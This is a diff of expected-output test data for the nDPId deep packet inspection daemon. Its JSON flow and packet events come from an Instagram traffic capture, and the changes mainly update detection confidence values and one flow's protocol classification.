00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2071,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796254515,"flow_last_seen":1568796254515,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796254515,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -176,47 +175,47 @@ 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2075,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1568796254526,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796254526,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wM6bGFkcwbWEHKASbHAfPgAAAgQFeAQCCArYQyzxDXB1TAEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2076,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1568796254527,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796254527,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDNAbsBxqpPpr5nHYAQCAyEugAAAQEICg1wdVYU9Z3G"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2077,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1568796254527,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796254527,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDOAbvBtYQcmxhZHYAQCAyyKQAAAQEICg1wdVbYQyzx"} -00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2078,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254514,"flow_last_seen":1568796254528,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254528,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2080,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254515,"flow_last_seen":1568796254531,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254531,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2078,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254514,"flow_last_seen":1568796254528,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254528,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2080,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254515,"flow_last_seen":1568796254531,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254531,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2082,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1568796254536,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796254536,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wM\/pQUID\/UzpE6ASbHCRrQAAAgQFeAQCCAoUEKcNDXB1VAEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2083,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1568796254538,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796254538,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDPAbv9TOkT6UFCBIAQCAwkmAAAAQEICg1wdV8UEKcN"} -00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2084,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254524,"flow_last_seen":1568796254539,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254539,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2088,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254514,"flow_last_seen":1568796254539,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":1568796254539,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2092,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254515,"flow_last_seen":1568796254543,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":529,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1568796254543,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2098,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254524,"flow_last_seen":1568796254551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":1154,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796254551,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2084,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254524,"flow_last_seen":1568796254539,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254539,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2088,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254514,"flow_last_seen":1568796254539,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":1568796254539,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2092,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254515,"flow_last_seen":1568796254543,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":529,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1568796254543,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2098,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254524,"flow_last_seen":1568796254551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":1154,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796254551,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7580000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1436720908576,"flow_last_seen":1436720908733,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4627,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1436720908577,"flow_last_seen":1436720908737,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4627,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1436720900687,"flow_last_seen":1436720901200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":46392,"flow_avg_l4_payload_len":799,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908533,"flow_last_seen":1436720908579,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1436720908576,"flow_last_seen":1436720908733,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4627,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1436720908577,"flow_last_seen":1436720908737,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4627,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1436720900687,"flow_last_seen":1436720901200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":46392,"flow_avg_l4_payload_len":799,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908533,"flow_last_seen":1436720908579,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}} 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1436720900692,"flow_last_seen":1436720900876,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3517,"flow_avg_l4_payload_len":502,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908531,"flow_last_seen":1436720908567,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908531,"flow_last_seen":1436720908567,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":18,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":18,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1436720901182,"flow_last_seen":1436720908544,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":788,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908523,"flow_last_seen":1436720908570,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":75,"flow_first_seen":1436720942530,"flow_last_seen":1436720942621,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":52289,"flow_avg_l4_payload_len":697,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908523,"flow_last_seen":1436720908570,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}} 